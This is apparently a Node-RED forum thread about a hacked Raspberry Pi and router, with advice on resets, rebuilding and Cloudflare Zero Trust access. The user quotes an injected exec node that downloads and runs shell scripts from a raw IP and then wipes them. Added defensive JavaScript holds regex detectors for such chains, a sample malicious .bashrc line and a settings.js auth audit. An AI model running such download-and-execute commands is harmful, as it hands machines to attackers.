Have I been hacked?

Pull the WAN from it now, and start checking your systems over.

Can the router be flashed with custom Firmware do you know?
Whilst unlikely, it is still possible that it has been flashed with a compromised firmware build to aid in the activity, so even if you reset it, the firmware may still be compromised and allowing a 'back door'.

It is certainly possible. What router make is it?

Also, do you have anything else running on that network?

You will need to change the router and wi-fi passwords but as Marcus says, ideally you would push a known good firmware onto the router if that is an option before doing anything else.

It's the most recent Vodafone router. Would a factory reset suffice?
Also, can anyone tell me why I have all that "bash not found" stuff in the terminal window? This is from a known good backup imaged SD card.
Thanks

Probably. Do the reset offline and change the passwords before connecting to the Internet. Leave other devices off your network until you are happy with the router.

I'll do that. Any ideas on the "bash not found" stuff?

I can't see any obvious issues with Vodafone routers in particular. One had a very weak default password but you are changing that anyway. Of course, choose a strong passcode for your router and wi-fi passcodes and don't forget to save them in a password manager so you don't lose them.

For a double-check, use GRC | ShieldsUP! - Internet Vulnerability Profiling to check that you don't have any open ports.

Looks like firmware updates for Vodafone routers are available via the admin interface: firmware.pdf (vodafone.ie)

I never do full-system backups because by the time you ever need to restore, the world has moved on a long way and things change.

So my recommendation is to start from scratch. Download a fresh copy of the latest Raspbian. Then install your dependencies: Node.js - via nodesource/distributions: NodeSource Node.js Binary Distributions (github.com) preferably, though you could use Dave's script if you prefer. Mosquitto. And anything else you need.

Take notes as you go along so that should you ever need to start again, you've left yourself some clues.

Finally, copy specific things like your userDir folder from your backup, and maybe your Mosquitto config if you can't remember how you set it.

Anyway, that's how I do it.

Talk to Vodafone support, tell them you were hacked and your router password changed back to the default. Ask them if a factory reset is safe.

When you start a terminal window the commands in .bashrc and /etc/rc.local (I think) are run.
If you open a terminal and run source ./.bashrc, do you see the same errors again?
and source /etc/rc.local?
If so, can you post the contents of .bashrc?

note:
/etc/rc.local is run when the system boots up, not when you open a terminal. Worth checking if it has been modified though.

6 solid hours now today. I did a factory reset and now it won't connect to the internet, saying "no ip4 address".
Vodafone support guy asked me 4 times about lights on unit and each time I told him that there were none. Anyway still no internet. Definitely been hacked! There is this horrible feeling like being burgled, as in what else have they taken.

It is a lot more than that. Best to look it up, I can never remember the full list but the profile is also run I think. And I can't remember if both the /etc version and the ~/ versions are run.

I plan to do a completely fresh install. There is a lot of stuff. Is it foolish to open a port for PiVPN?
That way I could get access to dashboard etc.

Personally I don't like full VPN connections due to the risks of a remote device being compromised and getting access to your network. The risk level depends on where you travel to though I suppose.

My preferred approach is to use Cloudflare Zero Trust which has an excellent free-tier. Using that, you can have login secured access to your Node-RED install without needing any holes in the firewall. You can also get a browser SSH terminal, again without having to expose your SSH via your router.

Can this be installed on a mobile phone? I use the dashboard web page to control lots of stuff on a remote site.

It is a web service so you access everything from your browser.

I have a couple of things set up:

  • A link to Node-RED (covers Editor, Dashboard, uibuilder, etc) - you use this as you would use Node-RED at home. But it has a different URL and is protected by Cloudflare's excellent security complete with up to 50 users for free.
  • A browser SSH terminal page.

Because it is Cloudflare, you get their excellent security, so you can restrict to certain countries, certain types of login and more. Logins can be specific user IDs or can be linked to external logins such as GitHub, LinkedIn, etc. (OAuth).

So yes, all accessible from a mobile.

The only possible downside is that you need a domain name and you need to let Cloudflare manage it. They also offer cheaper domain name registration by the way as they do not add overheads to the basic cost so grabbing a .uk, .com or whatever is as cheap as it can be and you get an excellent DNS management portal too and DNS security. You can leave your existing domains with your current registrar if you want to and just let Cloudflare manage it but they are so good, I've moved all of mine.

Great, I'll investigate.
Thanks again everyone.

I found this in my flows file:

```json
{
    "id": "04e9bf59d127ed59",
    "type": "exec",
    "z": "86baa6d42e952f84",
    "command": "cd /tmp && curl -O http://79.110.62.138/eskgbins.sh && chmod 777 eskgbins.sh && sh eskgbins.sh && tftp 79.110.62.138 -c get eskgtftp1.sh && chmod 777 eskgtftp1.sh && sh eskgtftp1.sh && tftp -r eskgtftp2.sh -g 79.110.62.138 && chmod 777 eskgtftp2.sh && sh eskgtftp2.sh && rm -rf eskgbins.sh eskgtftp1.sh eskgtftp2.sh && rm -rf *",
    "addpay": "payload",
    "append": "",
    "useSpawn": "false",
    "timer": "10080",
    "winHide": false,
    "oldrc": false,
    "name": "",
    "x": 600,
    "y": 600,
    "wires": [[], [], []]
}
```

PS: actually there are several more curl instances. I can upload them if they mean anything to anyone.
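As an added example (not code from this thread), a small Node.js script that does what the replies above suggest checking by hand: it parses a flows.json export for exec nodes whose command looks like a download-and-execute chain, and runs the same indicator matcher over the lines of a shell start-up file such as ~/.bashrc or /etc/rc.local. The sample flows array and the ~/.bashrc excerpt are constructed for the demo; the flagged exec node reuses a trimmed copy of the command quoted in the post above, and 203.0.113.5 is a documentation-range placeholder address.

```javascript
// Added example, not code from the thread. Scans a Node-RED flows.json export
// and shell start-up files for "download and execute" indicators.

// Each indicator carries a short label for the report.
const INDICATORS = [
  { name: 'download from raw IP', re: /\b(curl|wget|tftp)\b[^&|;]*\b\d{1,3}(\.\d{1,3}){3}\b/ },
  { name: 'world-writable chmod', re: /\bchmod\s+777\b/ },
  { name: 'chained or piped into sh', re: /(\|\s*(sh|bash)\b|&&\s*(sh|bash)\s+\S+)/ },
  { name: 'self-cleanup rm -rf', re: /\brm\s+-rf\b/ },
];

function matchIndicators(text) {
  return INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
}

// flows.json is normally a bare array of nodes; a project export may wrap it
// in { flows: [...] }. Returns one finding per exec node that trips an indicator.
function scanFlows(flowsJson) {
  const parsed = JSON.parse(flowsJson);
  const nodes = Array.isArray(parsed) ? parsed : parsed.flows || [];
  const findings = [];
  for (const node of nodes) {
    if (node.type !== 'exec' || typeof node.command !== 'string') continue;
    const indicators = matchIndicators(node.command);
    if (indicators.length > 0) {
      findings.push({ id: node.id, tab: node.z, indicators, command: node.command });
    }
  }
  return findings;
}

// Same matcher over the text of a start-up file (~/.bashrc, ~/.profile,
// /etc/rc.local). Blank lines and comments are skipped; line numbers are 1-based.
function scanStartupFile(contents) {
  const findings = [];
  contents.split('\n').forEach((raw, idx) => {
    const line = raw.trim();
    if (line === '' || line.startsWith('#')) return;
    const indicators = matchIndicators(line);
    if (indicators.length > 0) findings.push({ line: idx + 1, indicators, text: line });
  });
  return findings;
}

// Convenience wrapper for a real file on disk (reads lazily so the demo below
// needs no filesystem access).
function scanStartupPath(path) {
  return scanStartupFile(require('fs').readFileSync(path, 'utf8'));
}

// Constructed sample: a benign exec node plus a trimmed copy of the node from the post.
const SAMPLE_FLOWS = JSON.stringify([
  { id: 'tab1', type: 'tab', label: 'Heating' },
  { id: 'ok1', type: 'exec', z: 'tab1', command: 'vcgencmd measure_temp', wires: [[], [], []] },
  {
    id: '04e9bf59d127ed59', type: 'exec', z: '86baa6d42e952f84',
    command: 'cd /tmp && curl -O http://79.110.62.138/eskgbins.sh && chmod 777 eskgbins.sh && sh eskgbins.sh && rm -rf eskgbins.sh && rm -rf *',
    addpay: 'payload', wires: [[], [], []],
  },
]);

// Constructed ~/.bashrc excerpt; 203.0.113.5 is a documentation-range placeholder.
const SAMPLE_BASHRC = [
  '# ~/.bashrc',
  "alias ll='ls -alF'",
  'export PATH="$HOME/.local/bin:$PATH"',
  'curl -O http://203.0.113.5/x.sh && sh x.sh',
].join('\n');

// Demo run over the constructed samples.
console.log(JSON.stringify(scanFlows(SAMPLE_FLOWS), null, 2));
console.log(JSON.stringify(scanStartupFile(SAMPLE_BASHRC), null, 2));
```

To run it over a real Pi, pass the contents of ~/.node-red/flows.json to scanFlows and each start-up file path to scanStartupPath; anything it reports is worth comparing line by line against the known-good backup card, since the "bash not found" messages point at a start-up file that no longer matches what the shell expects.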

Yup!

You have been had by the same thing reported here; this suggests you had an unauthenticated Node-RED instance made public?
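The settings.js keys that close that hole, as an added example rather than anything from the thread or from the Node-RED project: the exposed default beside a locked-down version, and a small audit function that reports what is missing. adminAuth, httpNodeAuth and uiHost are real Node-RED settings; the bcrypt strings are placeholders to be replaced with the output of node-red admin hash-pw, and auditSettings is this example's own helper.

```javascript
// Added example, not code from the thread or from Node-RED itself.

// What a stock settings.js amounts to: no adminAuth, so anyone who can reach
// port 1880 can open the editor and deploy an exec node like the one above.
const exposedSettings = {
  uiPort: 1880,
  // adminAuth: { ... }   <- commented out in the default file
};

// Locked down: editor login required, HTTP-in/dashboard endpoints behind basic
// auth, and the editor bound to loopback so only a local reverse proxy or an
// SSH/Zero Trust tunnel can reach it. Hashes are PLACEHOLDERS; generate real
// ones with `node-red admin hash-pw`.
const lockedDownSettings = {
  uiPort: 1880,
  uiHost: '127.0.0.1',
  adminAuth: {
    type: 'credentials',
    users: [{ username: 'admin', password: '$2b$08$PLACEHOLDER_BCRYPT_HASH', permissions: '*' }],
  },
  httpNodeAuth: { user: 'dashboard', pass: '$2b$08$PLACEHOLDER_BCRYPT_HASH' },
};

// Returns a list of problems with a settings object; an empty list means none found.
function auditSettings(settings) {
  const problems = [];
  if (!settings.adminAuth) {
    problems.push('adminAuth missing: editor and admin API are unauthenticated');
  } else {
    const users = settings.adminAuth.users || [];
    if (settings.adminAuth.type === 'credentials' && users.length === 0) {
      problems.push('adminAuth has no users');
    }
    for (const u of users) {
      // Node-RED expects a bcrypt hash here, never a plaintext password.
      if (!/^\$2[aby]\$\d\d\$/.test(u.password || '')) {
        problems.push(`user ${u.username}: password is not a bcrypt hash`);
      }
    }
    const anon = settings.adminAuth.default;
    if (anon && anon.permissions === '*') {
      problems.push('adminAuth.default grants anonymous users full permissions');
    }
  }
  if (!settings.httpNodeAuth) {
    problems.push('httpNodeAuth missing: dashboard and HTTP-in endpoints are open');
  }
  const host = settings.uiHost || '0.0.0.0';
  if (host !== '127.0.0.1' && host !== 'localhost') {
    problems.push(`uiHost is ${host}: editor listens on every interface`);
  }
  return problems;
}

console.log('exposed:', auditSettings(exposedSettings));
console.log('locked down:', auditSettings(lockedDownSettings));
```

Binding to loopback only works if something else (an SSH tunnel or the Cloudflare tunnel described earlier in the thread) provides the remote path in; if the Pi must serve the dashboard on the LAN directly, keep uiHost open and rely on adminAuth plus httpNodeAuth instead.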

Was that flow present on the old backup SD card or did the pi get reinfected?

Have Vodafone given you any reassurance about the router?

Have you got other Linux computers on your network?

That curl item plus about 6 others were on the infected Pi. The backup SD card seems clean.
Vodafone folk said they had never heard of their routers being hacked.
This all happened at our holiday cottage, where we use a Pi to control heating, monitor oil etc. When we arrived and before discovering the hack I connected to our home via VPN to do some stuff. At home I have 2 Pis and a 24/7 PC. I don't know how viruses work but...

Anything connected to the Internet is fair game to hackers and bots. It takes less than 30 seconds for a newly connected IP address to start being scanned.

And you've found the problem with VPNs. They create an extension from one network to another, so compromises in one potentially extend to the other.

This is why I generally don't recommend them unless you know what you are doing.